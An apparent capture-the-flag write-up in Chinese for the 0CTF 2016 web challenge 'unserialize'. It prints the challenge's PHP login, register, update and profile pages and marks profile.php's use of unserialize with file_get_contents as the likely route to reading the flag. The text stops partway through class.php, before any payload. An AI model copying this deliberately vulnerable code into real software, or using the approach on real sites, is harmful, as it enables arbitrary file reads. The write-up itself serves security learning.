<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="utf-8">
  <link rel="icon" href="">
  <title>wuming/unserialize | wumingzhilian</title>
  <meta name="author" content="wuming" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    
      <meta name="description" itemprop="description" content="" />
    
    <meta property="og:title" content="wuming/unserialize" />
    
    <meta property="og:url" content="http://wumingzhilian.github.to/2020/09/05/0ctf-2016-Web-unserialize/" />
    
      <meta name="twitter:card" content="summary" />
      <meta name="twitter:site" content="@wumingzhilian" />
      <meta name="twitter:title" content="wuming/unserialize" />
      
        <meta name="twitter:description" content="" />
      
      
    
  
  <link rel="alternate" href="atom.xml" type="application/atom+xml">
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="highlight-css" href="/css/highlight.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="fontawe-css" href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="nprogress-css" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" type="text/css" media="all">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/disqusjs@1.2.6/dist/disqusjs.css">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-dark.min.css" type="text/css" media="all">
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
  
    <script async src="https://cdn.jsdelivr.net/npm/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
    <script async src="https://cdn.jsdelivr.net/npm/disqusjs@1.2.6/dist/disqus.js"></script>
  
<meta name="generator" content="Hexo 5.0.0"></head>
<body class="custom-background">
    <div id="kratos-wrapper">
        <div id="kratos-page">
            <div id="kratos-header">
                <div class="nav-toggle"><a class="kratos-nav-toggle js-kratos-nav-toggle"><i></i></a></div>
                <header id="kratos-header-section">
                    <div class="container">
                        <div class="nav-header">
                            <div class="color-logo"><a href="/">wumingzhilian</a></div>
                            <nav id="kratos-menu-wrap">
                              <ul id="kratos-primary-menu" class="sf-menu">
                              
                                
                                  <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                
                              
                                
                                  <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                
                              
                                
                                  <li><a href="/friends/"><i class="fa fa-mars-double"></i>好伙伴</a></li>
                                
                              
                                
                                  <li><a href="/about/"><li><i class="fa fa-paper-plane"></i>关于我</a></li>
                                
                              
                              </ul>
                            </nav>
                        </div>
                    </div>
                </header>
            </div>

<div class="kratos-start kratos-hero-2">
    <!-- <div class="kratos-overlay"></div> -->
    <div class="kratos-cover kratos-cover-2 text-center">
        <div class="desc desc2 animate-box">
            <a href="/"><h2>wumingzhilian</h2><br><span></span></a>
        </div>
    </div>
</div>

<div id="kratos-blog-post">
    <div class="container">
            <div class="row">
                
<div id="main">
    <section class="col-md-8">
    <article>
        <div class="kratos-hentry kratos-post-inner clearfix">
            <header class="kratos-entry-header">
                <h1 class="kratos-entry-title text-center">wuming/unserialize</h1>
                
                <div class="kratos-post-meta text-center">
                    <span>
                    <i class="fa fa-calendar"></i> 2020-09-05
                    <i class="fa fa-folder"></i> 分类于 <a class="label-link" href="/categories/CTF/">CTF</a>
                    <i class="fa fa-user"></i> 作者 wuming
                    </span>
                </div>
            </header>
            <div class="kratos-post-content">
                
                    <div class="kratos-post-inner-toc">
                        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01"><span class="toc-number">1.</span> <span class="toc-text">0x01</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%99%BB%E9%99%86%E9%A1%B5%E9%9D%A2"><span class="toc-number">2.</span> <span class="toc-text">登陆页面</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C"><span class="toc-number">3.</span> <span class="toc-text">注册</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03"><span class="toc-number">3.1.</span> <span class="toc-text">0x03</span></a></li></ol></li></ol>
                    </div>
                
                <hr />
                <h1 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h1><p>拿到题目第一件事是进行目录扫描，看看都有哪些目录，结果如下：</p>
<p><img src="https://img-blog.csdnimg.cn/2020090512081417.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>不少，首先有源码，我们直接下载下来，因为有源码去分析比什么都没有更容易分析出漏洞所在。<br><img src="https://img-blog.csdnimg.cn/20200905120836362.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>通过这个知道，它一共有这么几个页面，首页登录页面，注册页面，update更改信息页面，这几个页面是我们能够直接接触到的，那想必flag应该在另外几个页面中，稍后我们分析。先来看看网站页面都是什么样子。</p>
<h1 id="登陆页面"><a href="#登陆页面" class="headerlink" title="登陆页面"></a>登陆页面</h1><p><img src="https://img-blog.csdnimg.cn/20200905120923782.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<h1 id="注册"><a href="#注册" class="headerlink" title="注册"></a>注册</h1><p><img src="https://img-blog.csdnimg.cn/20200905121408660.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200905121443351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>随便注册一个登录进去<br>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    require_once(&#39;class.php&#39;);</span><br><span class="line">    if($_SESSION[&#39;username&#39;]) &#123;</span><br><span class="line">        header(&#39;Location: profile.php&#39;);</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">    if($_POST[&#39;username&#39;] &amp;&amp; $_POST[&#39;password&#39;]) &#123;</span><br><span class="line">        $username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">        $password &#x3D; $_POST[&#39;password&#39;];</span><br><span class="line"></span><br><span class="line">        if(strlen($username) &lt; 3 or strlen($username) &gt; 16) </span><br><span class="line">            die(&#39;Invalid user name&#39;);</span><br><span class="line"></span><br><span class="line">        if(strlen($password) &lt; 3 or strlen($password) &gt; 16) </span><br><span class="line">            die(&#39;Invalid password&#39;);</span><br><span class="line"></span><br><span class="line">        if($user-&gt;login($username, $password)) &#123;</span><br><span class="line">            $_SESSION[&#39;username&#39;] &#x3D; $username;</span><br><span class="line">            header(&#39;Location: profile.php&#39;);</span><br><span class="line">            exit;    </span><br><span class="line">        &#125;</span><br><span class="line">        else &#123;</span><br><span class="line">            die(&#39;Invalid user name or password&#39;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">   &lt;title&gt;Login&lt;&#x2F;title&gt;</span><br><span class="line">   &lt;link href&#x3D;&quot;static&#x2F;bootstrap.min.css&quot; rel&#x3D;&quot;stylesheet&quot;&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;jquery.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;bootstrap.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;div class&#x3D;&quot;container&quot; style&#x3D;&quot;margin-top:100px&quot;&gt;  </span><br><span class="line">        &lt;form action&#x3D;&quot;index.php&quot; method&#x3D;&quot;post&quot; class&#x3D;&quot;well&quot; style&#x3D;&quot;width:220px;margin:0px auto;&quot;&gt; </span><br><span class="line">            &lt;img src&#x3D;&quot;static&#x2F;piapiapia.gif&quot; class&#x3D;&quot;img-memeda &quot; style&#x3D;&quot;width:180px;margin:0px auto;&quot;&gt;</span><br><span class="line">            &lt;h3&gt;Login&lt;&#x2F;h3&gt;</span><br><span class="line">            &lt;label&gt;Username:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;username&quot; style&#x3D;&quot;height:30px&quot;class&#x3D;&quot;span3&quot;&#x2F;&gt;</span><br><span class="line">            &lt;label&gt;Password:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;password&quot; name&#x3D;&quot;password&quot; style&#x3D;&quot;height:30px&quot; class&#x3D;&quot;span3&quot;&gt;</span><br><span class="line"></span><br><span class="line">            &lt;button type&#x3D;&quot;submit&quot; class&#x3D;&quot;btn btn-primary&quot;&gt;LOGIN&lt;&#x2F;button&gt;</span><br><span class="line">        &lt;&#x2F;form&gt;</span><br><span class="line">    &lt;&#x2F;div&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这个无非就是登录页面，输入账号和密码，如果正确，那就跳转到profile.php页面，就是显示你个人信息的页面</p>
<p>register.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    require_once(&#39;class.php&#39;);</span><br><span class="line">    if($_POST[&#39;username&#39;] &amp;&amp; $_POST[&#39;password&#39;]) &#123;</span><br><span class="line">        $username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">        $password &#x3D; $_POST[&#39;password&#39;];</span><br><span class="line"></span><br><span class="line">        if(strlen($username) &lt; 3 or strlen($username) &gt; 16) </span><br><span class="line">            die(&#39;Invalid user name&#39;);</span><br><span class="line"></span><br><span class="line">        if(strlen($password) &lt; 3 or strlen($password) &gt; 16) </span><br><span class="line">            die(&#39;Invalid password&#39;);</span><br><span class="line">        if(!$user-&gt;is_exists($username)) &#123;</span><br><span class="line">            $user-&gt;register($username, $password);</span><br><span class="line">            echo &#39;Register OK!&lt;a href&#x3D;&quot;index.php&quot;&gt;Please Login&lt;&#x2F;a&gt;&#39;;        </span><br><span class="line">        &#125;</span><br><span class="line">        else &#123;</span><br><span class="line">            die(&#39;User name Already Exists&#39;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">   &lt;title&gt;Login&lt;&#x2F;title&gt;</span><br><span class="line">   &lt;link href&#x3D;&quot;static&#x2F;bootstrap.min.css&quot; rel&#x3D;&quot;stylesheet&quot;&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;jquery.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;bootstrap.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;div class&#x3D;&quot;container&quot; style&#x3D;&quot;margin-top:100px&quot;&gt;  </span><br><span class="line">        &lt;form action&#x3D;&quot;register.php&quot; method&#x3D;&quot;post&quot; class&#x3D;&quot;well&quot; style&#x3D;&quot;width:220px;margin:0px auto;&quot;&gt; </span><br><span class="line">            &lt;img src&#x3D;&quot;static&#x2F;piapiapia.gif&quot; class&#x3D;&quot;img-memeda &quot; style&#x3D;&quot;width:180px;margin:0px auto;&quot;&gt;</span><br><span class="line">            &lt;h3&gt;Register&lt;&#x2F;h3&gt;</span><br><span class="line">            &lt;label&gt;Username:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;username&quot; style&#x3D;&quot;height:30px&quot;class&#x3D;&quot;span3&quot;&#x2F;&gt;</span><br><span class="line">            &lt;label&gt;Password:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;password&quot; name&#x3D;&quot;password&quot; style&#x3D;&quot;height:30px&quot; class&#x3D;&quot;span3&quot;&gt;</span><br><span class="line"></span><br><span class="line">            &lt;button type&#x3D;&quot;submit&quot; class&#x3D;&quot;btn btn-primary&quot;&gt;REGISTER&lt;&#x2F;button&gt;</span><br><span class="line">        &lt;&#x2F;form&gt;</span><br><span class="line">    &lt;&#x2F;div&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>注册页面，没有可疑地方</p>
<p>update.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    require_once(&#39;class.php&#39;);</span><br><span class="line">    if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;</span><br><span class="line">        die(&#39;Login First&#39;);    </span><br><span class="line">    &#125;</span><br><span class="line">    if($_POST[&#39;phone&#39;] &amp;&amp; $_POST[&#39;email&#39;] &amp;&amp; $_POST[&#39;nickname&#39;] &amp;&amp; $_FILES[&#39;photo&#39;]) &#123;</span><br><span class="line"></span><br><span class="line">        $username &#x3D; $_SESSION[&#39;username&#39;];</span><br><span class="line">        if(!preg_match(&#39;&#x2F;^\d&#123;11&#125;$&#x2F;&#39;, $_POST[&#39;phone&#39;]))</span><br><span class="line">            die(&#39;Invalid phone&#39;);</span><br><span class="line"></span><br><span class="line">        if(!preg_match(&#39;&#x2F;^[_a-zA-Z0-9]&#123;1,10&#125;@[_a-zA-Z0-9]&#123;1,10&#125;\.[_a-zA-Z0-9]&#123;1,10&#125;$&#x2F;&#39;, $_POST[&#39;email&#39;]))</span><br><span class="line">            die(&#39;Invalid email&#39;);</span><br><span class="line">        </span><br><span class="line">        if(preg_match(&#39;&#x2F;[^a-zA-Z0-9_]&#x2F;&#39;, $_POST[&#39;nickname&#39;]) || strlen($_POST[&#39;nickname&#39;]) &gt; 10)</span><br><span class="line">            die(&#39;Invalid nickname&#39;);</span><br><span class="line"></span><br><span class="line">        $file &#x3D; $_FILES[&#39;photo&#39;];</span><br><span class="line">        if($file[&#39;size&#39;] &lt; 5 or $file[&#39;size&#39;] &gt; 1000000)</span><br><span class="line">            die(&#39;Photo size error&#39;);</span><br><span class="line"></span><br><span class="line">        move_uploaded_file($file[&#39;tmp_name&#39;], &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]));</span><br><span class="line">        $profile[&#39;phone&#39;] &#x3D; $_POST[&#39;phone&#39;];</span><br><span class="line">        $profile[&#39;email&#39;] &#x3D; $_POST[&#39;email&#39;];</span><br><span class="line">        $profile[&#39;nickname&#39;] &#x3D; $_POST[&#39;nickname&#39;];</span><br><span class="line">        $profile[&#39;photo&#39;] &#x3D; &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]);</span><br><span class="line"></span><br><span class="line">        $user-&gt;update_profile($username, serialize($profile));</span><br><span class="line">        echo &#39;Update Profile Success!&lt;a href&#x3D;&quot;profile.php&quot;&gt;Your Profile&lt;&#x2F;a&gt;&#39;;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">   &lt;title&gt;UPDATE&lt;&#x2F;title&gt;</span><br><span class="line">   &lt;link href&#x3D;&quot;static&#x2F;bootstrap.min.css&quot; rel&#x3D;&quot;stylesheet&quot;&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;jquery.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;bootstrap.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;div class&#x3D;&quot;container&quot; style&#x3D;&quot;margin-top:100px&quot;&gt;  </span><br><span class="line">        &lt;form action&#x3D;&quot;update.php&quot; method&#x3D;&quot;post&quot; enctype&#x3D;&quot;multipart&#x2F;form-data&quot; class&#x3D;&quot;well&quot; style&#x3D;&quot;width:220px;margin:0px auto;&quot;&gt; </span><br><span class="line">            &lt;img src&#x3D;&quot;static&#x2F;piapiapia.gif&quot; class&#x3D;&quot;img-memeda &quot; style&#x3D;&quot;width:180px;margin:0px auto;&quot;&gt;</span><br><span class="line">            &lt;h3&gt;Please Update Your Profile&lt;&#x2F;h3&gt;</span><br><span class="line">            &lt;label&gt;Phone:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;phone&quot; style&#x3D;&quot;height:30px&quot;class&#x3D;&quot;span3&quot;&#x2F;&gt;</span><br><span class="line">            &lt;label&gt;Email:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;email&quot; style&#x3D;&quot;height:30px&quot;class&#x3D;&quot;span3&quot;&#x2F;&gt;</span><br><span class="line">            &lt;label&gt;Nickname:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;nickname&quot; style&#x3D;&quot;height:30px&quot; class&#x3D;&quot;span3&quot;&gt;</span><br><span class="line">            &lt;label for&#x3D;&quot;file&quot;&gt;Photo:&lt;&#x2F;label&gt;</span><br><span class="line">            &lt;input type&#x3D;&quot;file&quot; name&#x3D;&quot;photo&quot; style&#x3D;&quot;height:30px&quot;class&#x3D;&quot;span3&quot;&#x2F;&gt;</span><br><span class="line">            &lt;button type&#x3D;&quot;submit&quot; class&#x3D;&quot;btn btn-primary&quot;&gt;UPDATE&lt;&#x2F;button&gt;</span><br><span class="line">        &lt;&#x2F;form&gt;</span><br><span class="line">    &lt;&#x2F;div&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>更改信息页面，将输入的信息传入相应参数，且需要满足一定的正则过滤规则，</p>
<p>profile.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    require_once(&#39;class.php&#39;);</span><br><span class="line">    if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;</span><br><span class="line">        die(&#39;Login First&#39;);    </span><br><span class="line">    &#125;</span><br><span class="line">    $username &#x3D; $_SESSION[&#39;username&#39;];</span><br><span class="line">    $profile&#x3D;$user-&gt;show_profile($username);</span><br><span class="line">    if($profile  &#x3D;&#x3D; null) &#123;</span><br><span class="line">        header(&#39;Location: update.php&#39;);</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        $profile &#x3D; unserialize($profile);</span><br><span class="line">        $phone &#x3D; $profile[&#39;phone&#39;];</span><br><span class="line">        $email &#x3D; $profile[&#39;email&#39;];</span><br><span class="line">        $nickname &#x3D; $profile[&#39;nickname&#39;];</span><br><span class="line">        $photo &#x3D; base64_encode(file_get_contents($profile[&#39;photo&#39;]));</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">   &lt;title&gt;Profile&lt;&#x2F;title&gt;</span><br><span class="line">   &lt;link href&#x3D;&quot;static&#x2F;bootstrap.min.css&quot; rel&#x3D;&quot;stylesheet&quot;&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;jquery.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">   &lt;script src&#x3D;&quot;static&#x2F;bootstrap.min.js&quot;&gt;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;div class&#x3D;&quot;container&quot; style&#x3D;&quot;margin-top:100px&quot;&gt;  </span><br><span class="line">        &lt;img src&#x3D;&quot;data:image&#x2F;gif;base64,&lt;?php echo $photo; ?&gt;&quot; class&#x3D;&quot;img-memeda &quot; style&#x3D;&quot;width:180px;margin:0px auto;&quot;&gt;</span><br><span class="line">        &lt;h3&gt;Hi &lt;?php echo $nickname;?&gt;&lt;&#x2F;h3&gt;</span><br><span class="line">        &lt;label&gt;Phone: &lt;?php echo $phone;?&gt;&lt;&#x2F;label&gt;</span><br><span class="line">        &lt;label&gt;Email: &lt;?php echo $email;?&gt;&lt;&#x2F;label&gt;</span><br><span class="line">    &lt;&#x2F;div&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>看到这里的代码的时候突然眼前一亮，反序列化，做题做多了，对这个就很敏感，而且profile页面的数据是接受来自update，即我们修改信息的那个页面，光有这个不行，真正引起我注意的这段代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$photo &#x3D; base64_encode(file_get_contents($profile[&#39;photo&#39;]));</span><br></pre></td></tr></table></figure>
<p>因为flag一般在一个文件中，要想知道flag，一般需要读取，有文件读取功能的函数file_get_contents（）引起了我的注意，我就想，会不会是这个地方能够读取到flag呢？到这里我们想起还有两个源码我们没有看，是class.php和config.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span 